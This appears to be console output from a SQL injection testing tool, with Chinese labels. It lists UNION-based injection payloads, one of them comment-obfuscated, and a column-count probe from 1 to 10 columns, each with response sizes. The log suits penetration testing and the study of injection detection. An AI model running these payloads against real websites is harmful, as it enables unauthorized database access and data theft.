🔥 验证SQL注入 - 响应差异分析
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[*] 发现 25 个候选payload

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🔍 Payload: MAU2'+UNION+SELECT+NULL--
   响应大小: 4452 bytes
   实际大小: 4452 bytes
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🔍 Payload: MAU2'+UNION+ALL+SELECT+NULL--
   响应大小: 4464 bytes
   实际大小: 4464 bytes
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🔍 Payload: MAU2'+UNION+SELECT+NULL,NULL--
   响应大小: 4467 bytes
   实际大小: 4467 bytes
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🔍 Payload: MAU2'+UNION+SELECT+NULL,NULL,NULL--
   响应大小: 4482 bytes
   实际大小: 4482 bytes
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🔍 Payload: MAU2'/**/UNION/**/SELECT/**/NULL--
   响应大小: 4485 bytes
   实际大小: 4485 bytes

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🔍 测试UNION注入（增加列数）
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  1 列: 4452 bytes -
  2 列: 4467 bytes -
  3 列: 4482 bytes -
  4 列: 4493 bytes -
  5 列: 4508 bytes -
  6 列: 4523 bytes -
  7 列: 4534 bytes -
  8 列: 4549 bytes -
  9 列: 4564 bytes -
  10 列: 4575 bytes -

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📋 SQL注入验证完成
